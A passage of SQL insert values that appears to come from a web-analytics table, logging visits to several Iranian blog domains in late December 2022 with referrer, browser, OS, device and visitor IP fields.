(26994,'2022-12-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(26995,'2022-12-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(26996,'2022-12-22','http://design-arena.ir/blog','Firefox','Unknown','.','desktop','Unknown','','142.93.105.127','000',0,2,0),
(26997,'2022-12-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.251.13.194','000',0,2,0),
(26998,'2022-12-22','http://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','41.217.94.98','000',0,1,0),
(26999,'2022-12-23','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.72','000',0,2,0),
(27000,'2022-12-23','http://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','16.170.133.191','000',0,4,0),
(27001,'2022-12-23','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,14,0),
(27002,'2022-12-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','139.162.16.198','000',0,23,0),
(27003,'2022-12-23','http://ictbank.ir/blog','Chrome','Windows','47.0.0.0','desktop','Unknown','','185.119.81.108','000',0,4,0),
(27004,'2022-12-23','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(27005,'2022-12-23','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','182.43.148.98','000',0,2,0),
(27006,'2022-12-23','http://wikisonnati.com/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.189.171.179','000',0,2,0),
(27007,'2022-12-23','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.210.98.71','000',0,2,0),
(27008,'2022-12-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(27009,'2022-12-23','http://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','47.89.154.12','000',0,2,0),
(27010,'2022-12-23','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','176.58.123.94','000',0,2,0),
(27011,'2022-12-23','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','200.4.142.32','000',0,2,0),
(27012,'2022-12-23','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','188.166.224.48','000',0,1,0),
(27013,'2022-12-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,4,0),
(27014,'2022-12-23','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,8,0),
(27015,'2022-12-23','http://ictbank.ir/blog','Firefox','Windows','55.0','desktop','Unknown','','207.244.225.219','000',0,4,0),
(27016,'2022-12-23','http://wikisonnati.com','Chrome','Windows','50.0.0.0','desktop','Unknown','','188.165.157.120','000',0,2,0),
(27017,'2022-12-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.199.124.59','000',0,1,0),
(27018,'2022-12-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(27019,'2022-12-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(27020,'2022-12-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(27021,'2022-12-23','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(27022,'2022-12-23','http://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(27023,'2022-12-23','http://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','44.229.11.30','000',0,2,0),
(27024,'2022-12-23','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(27025,'2022-12-23','http://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','51.254.53.14','000',0,1,0),
(27026,'2022-12-23','http://wikisonnati.com','Chrome','Linux','44.0.0.0','desktop','Unknown','','185.129.62.63','000',0,2,0),
(27027,'2022-12-24','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.16','000',0,1,0),
(27028,'2022-12-24','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(27029,'2022-12-24','http://ictbank.ir/blog','Chrome','OS X','11.0.0.0','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(27030,'2022-12-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,2,0),
(27031,'2022-12-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.185.4.69','000',0,1,0),
(27032,'2022-12-24','http://wikisonnati.com','Chrome','Windows','69.0.0.0','desktop','Unknown','','185.146.232.168','000',0,2,0),
(27033,'2022-12-24','http://ictbank.ir','Unknown','Windows','Unknown','desktop','Unknown','','149.34.246.122','000',0,3,0),
(27034,'2022-12-24','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','59.36.163.204','000',0,2,0),
(27035,'2022-12-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','37.139.53.9','000',0,3,0),
(27036,'2022-12-24','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,4,0),
(27037,'2022-12-24','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.121','000',0,2,0),
(27038,'2022-12-24','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.45','000',0,2,0),
(27039,'2022-12-24','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(27040,'2022-12-24','http://ictbank.ir/blog','Firefox','Windows','64.0','desktop','Unknown','','188.166.231.22','000',0,2,0),
(27041,'2022-12-24','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(27042,'2022-12-24','http://ictbank.ir/blog','Chrome','Windows','53.0.0.0','desktop','Unknown','','3.80.117.17','000',0,2,0),
(27043,'2022-12-24','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.39','000',0,2,0),
(27044,'2022-12-24','http://ictbank.ir/blog/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.50','000',0,8,0),
(27045,'2022-12-24','http://ictbank.ir/blog','Safari','iOS','6.0','tablet','iPad','','130.255.166.11','000',0,1,0),
(27046,'2022-12-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','107.191.63.227','000',0,1,0),
(27047,'2022-12-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,2,0),
(27048,'2022-12-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(27049,'2022-12-24','http://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.152.255','000',0,2,0),
(27050,'2022-12-25','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,18,0),
(27051,'2022-12-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.89','000',0,2,0),
(27052,'2022-12-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(27053,'2022-12-25','https://cn.bing.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','106.120.130.7','000',0,4,0),
(27054,'2022-12-25','http://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(27055,'2022-12-25','http://ictbank.ir/blog','Firefox','OS X','50.0','desktop','Macintosh','','162.55.237.166','000',0,2,0),
(27056,'2022-12-25','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,3,0),
(27057,'2022-12-25','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.240.101.111','000',0,1,0),
(27058,'2022-12-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,4,0),
(27059,'2022-12-25','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(27060,'2022-12-25','http://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(27061,'2022-12-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(27062,'2022-12-25','https://www.bing.com','Chrome','Windows','28.0.0.0','desktop','Unknown','','104.131.7.124','000',0,1,0),
(27063,'2022-12-25','https://www.bing.com/','Edge','Windows','109.0.0.0','desktop','Unknown','','18.133.196.253','000',0,1,0),
(27064,'2022-12-25','http://www.ictbank.ir','Chrome','Windows','86.0.0.0','desktop','Unknown','','107.167.39.74','000',0,2,0),
(27065,'2022-12-25','http://45.92.94.221/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.89.195.210','000',0,1,0),
(27066,'2022-12-25','http://45.92.94.221/blog/','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.90.156','000',0,1,0),
(27067,'2022-12-25','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(27068,'2022-12-25','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','8.142.168.136','000',0,2,0),
(27069,'2022-12-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.199.124.59','000',0,1,0),
(27070,'2022-12-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(27071,'2022-12-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(27072,'2022-12-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(27073,'2022-12-25','http://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.15','000',0,2,0),
(27074,'2022-12-25','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(27075,'2022-12-25','http://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.174','000',0,2,0),
(27076,'2022-12-25','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(27077,'2022-12-25','http://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.154','000',0,2,0),
(27078,'2022-12-26','http://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(27079,'2022-12-26','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,4,0),
(27080,'2022-12-26','http://mail.design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','62.171.177.111','000',0,2,0),
(27081,'2022-12-26','http://ictbank.ir/blog','Firefox','Windows','107.0','desktop','Unknown','','45.154.231.32','000',0,2,0),
(27082,'2022-12-26','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.247.179.42','000',0,2,0),
(27083,'2022-12-26','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','123.231.237.130','000',0,1,0),
(27084,'2022-12-26','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(27085,'2022-12-26','http://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(27086,'2022-12-26','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','79.137.248.52','000',0,2,0),
(27087,'2022-12-26','http://design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','209.126.86.35','000',0,3,0),
(27088,'2022-12-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.89','000',0,2,0),
(27089,'2022-12-26','http://ictbank.ir/blog','Firefox','Windows','73.0.0','desktop','Unknown','','5.161.183.84','000',0,1,0),
(27090,'2022-12-26','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.54.110','000',0,1,0),
(27091,'2022-12-26','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(27092,'2022-12-26','http://design-arena.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.218','000',0,1,0),
(27093,'2022-12-26','http://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.221','000',0,1,0),
(27094,'2022-12-26','http://design-arena.ir/blog/','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.227','000',0,1,0),
(27095,'2022-12-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(27096,'2022-12-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','31.22.4.18','000',0,1,0),
(27097,'2022-12-26','http://ictbank.ir/blog','Chrome','Windows','69.0.0.0','desktop','Unknown','','89.107.184.71','000',0,5,0),
(27098,'2022-12-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.124.61','000',0,1,0),
(27099,'2022-12-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(27100,'2022-12-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(27101,'2022-12-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(27102,'2022-12-26','http://ictbank.ir/blog','Chrome','Windows','56.0.0.0','desktop','Unknown','','51.38.132.211','000',0,3,0),
(27103,'2022-12-26','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','88.99.136.18','000',0,5,0),
(27104,'2022-12-26','http://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','194.117.236.98','000',0,10,0),
(27105,'2022-12-26','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Edge','Windows','90.0.0.0','desktop','Unknown','','37.139.53.26','000',0,8,0),
(27106,'2022-12-26','http://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','2.181.34.141','000',0,9,0),
(27107,'2022-12-26','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.40','000',0,8,0),
(27108,'2022-12-27','http://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.87','000',0,2,0),
(27109,'2022-12-27','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(27110,'2022-12-27','http://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(27111,'2022-12-27','http://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.89','000',0,1,0),
(27112,'2022-12-27','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.2','000',0,1,0),
(27113,'2022-12-27','http://wikisonnati.com/blog','Chrome','OS X','80.0.0.0','desktop','Macintosh','','5.161.77.235','000',0,2,0),
(27114,'2022-12-27','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.66.38','000',0,1,0),
(27115,'2022-12-27','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(27116,'2022-12-27','http://ictbank.ir/blog','Chrome','Windows','22.0.0.0','desktop','Unknown','','45.143.201.87','000',0,1,0),
(27117,'2022-12-27','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.202.177.46','000',0,1,0),
(27118,'2022-12-27','http://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','95.105.127.54','000',0,6,0),
(27119,'2022-12-27','http://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(27120,'2022-12-27','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','79.137.248.52','000',0,2,0),
(27121,'2022-12-27','http://design-arena.ir/blog','Chrome','Windows','80.0.0','desktop','Unknown','','65.108.82.35','000',0,2,0),
(27122,'2022-12-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,2,0),
(27123,'2022-12-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.210.248','000',0,1,0),
(27124,'2022-12-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(27125,'2022-12-27','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(27126,'2022-12-27','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(27127,'2022-12-27','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','180.163.220.66','000',0,1,0),
(27128,'2022-12-27','http://design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.189.170.101','000',0,2,0),
(27129,'2022-12-27','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','159.203.122.118','000',0,2,0),
(27130,'2022-12-28','http://www.design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.189.171.179','000',0,2,0),
(27131,'2022-12-28','http://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(27132,'2022-12-28','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','173.252.127.7','000',0,1,0),
(27133,'2022-12-28','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','173.252.127.8','000',0,1,0),
(27134,'2022-12-28','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.83.26.250','000',0,1,0),
(27135,'2022-12-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,4,0),
(27136,'2022-12-28','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(27137,'2022-12-28','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(27138,'2022-12-28','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','172.104.193.53','000',0,2,0),
(27139,'2022-12-28','http://ictbank.ir/blog','Firefox','Windows','48.0','desktop','Unknown','','121.204.156.106','000',0,1,0),
(27140,'2022-12-28','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(27141,'2022-12-28','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.108.9.38','000',0,2,0),
(27142,'2022-12-28','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(27143,'2022-12-28','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','195.128.226.61','000',0,1,0),
(27144,'2022-12-28','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','14.161.25.81','000',0,1,0),
(27145,'2022-12-28','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.220.112.22','000',0,2,0),
(27146,'2022-12-28','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,5,0),
(27147,'2022-12-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,4,0),
(27148,'2022-12-28','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','81.93.142.130','000',0,2,0),
(27149,'2022-12-28','http://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(27150,'2022-12-28','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','203.150.228.102','000',0,1,0),
(27151,'2022-12-28','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','78.153.130.91','000',0,2,0),
(27152,'2022-12-28','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','89.46.223.134','000',0,2,0),
(27153,'2022-12-28','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.149.216.7','000',0,1,0),
(27154,'2022-12-28','http://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','174.93.79.67','000',0,2,0),
(27155,'2022-12-28','http://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','83.166.244.113','000',0,1,0),
(27156,'2022-12-28','https://www.google.com/','Chrome','Android','108.0.0.0','mobile:smart','Redmi Note 7','','103.105.27.107','000',0,2,0),
(27157,'2022-12-28','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,1,0),
(27158,'2022-12-28','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','222.94.163.53','000',0,1,0),
(27159,'2022-12-28','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','42.48.78.188','000',0,1,0),
(27160,'2022-12-28','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Blade A520','','61.147.15.67','000',0,4,0),
(27161,'2022-12-28','http://wikisonnati.com/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.184.240','000',0,2,0),
(27162,'2022-12-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(27163,'2022-12-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','140.82.52.24','000',0,1,0),
(27164,'2022-12-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(27165,'2022-12-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(27166,'2022-12-28','http://ns11.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.143','000',0,2,0),
(27167,'2022-12-28','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','79.137.248.52','000',0,2,0),
(27168,'2022-12-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(27169,'2022-12-28','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.22','000',0,8,0),
(27170,'2022-12-29','http://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(27171,'2022-12-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(27172,'2022-12-29','http://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.1.248.34','000',0,2,0),
(27173,'2022-12-29','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.140.19','000',0,2,0),
(27174,'2022-12-29','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(27175,'2022-12-29','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,3,0),
(27176,'2022-12-29','http://ictbank.ir/blog','Chrome','OS X','53.0.0.0','desktop','Macintosh','','60.191.125.35','000',0,1,0),
(27177,'2022-12-29','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(27178,'2022-12-29','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','23.247.137.83','000',0,1,0),
(27179,'2022-12-29','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','66.249.84.121','000',0,1,0),
(27180,'2022-12-29','http://ictbank.ir/blog','Chrome','Windows','34.0.0.0','desktop','Unknown','','46.101.9.216','000',0,1,0),
(27181,'2022-12-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(27182,'2022-12-29','http://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','45.40.56.112','000',0,3,0),
(27183,'2022-12-29','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.149.253.38','000',0,2,0),
(27184,'2022-12-29','http://45.92.94.221:80/blog','Safari','OS X','9.0.0','desktop','Macintosh','','80.94.92.24','000',0,2,0),
(27185,'2022-12-29','http://ictbank.ir/blog','Chrome','Linux','106.0.0.0','desktop','Unknown','','35.165.215.140','000',0,1,0),
(27186,'2022-12-29','https://www.google.com/','Chrome','Linux','108.0.0.0','desktop','Unknown','','178.74.226.131','000',0,1,0),
(27187,'2022-12-29','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(27188,'2022-12-29','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','83.44.123.42','000',0,1,0),
(27189,'2022-12-29','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.35.53.106','000',0,1,0),
(27190,'2022-12-29','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','199.127.56.236','000',0,1,0),
(27191,'2022-12-29','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','89.46.223.134','000',0,1,0),
(27192,'2022-12-29','http://ictbank.ir/blog','Chrome','Android','55.0.0.0','mobile:smart','Nexus 5','','119.164.103.175','000',0,1,0),
(27193,'2022-12-29','http://ictbank.ir/blog','Chrome','Android','55.0.0.0','mobile:smart','Nexus 5','','42.48.79.55','000',0,1,0),
(27194,'2022-12-29','http://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','95.105.127.54','000',0,6,0),
(27195,'2022-12-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(27196,'2022-12-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','140.82.52.24','000',0,1,0),
(27197,'2022-12-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(27198,'2022-12-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(27199,'2022-12-29','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','189.37.71.124','000',0,2,0),
(27200,'2022-12-29','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(27201,'2022-12-29','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','137.184.122.190','000',0,1,0),
(27202,'2022-12-29','https://www.bing.com','Chrome','Windows','35.0.0.0','desktop','Unknown','','45.55.135.165','000',0,20,0),
(27203,'2022-12-29','http://45.92.94.221/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(27204,'2022-12-29','http://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(27205,'2022-12-29','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.112','000',0,1,0),
(27206,'2022-12-29','http://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.51.222','000',0,1,0),
(27207,'2022-12-29','http://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.35.128','000',0,2,0),
(27208,'2022-12-29','http://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,1,0),
(27209,'2022-12-29','http://www.ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.41.193','000',0,1,0),
(27210,'2022-12-29','http://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,1,0),
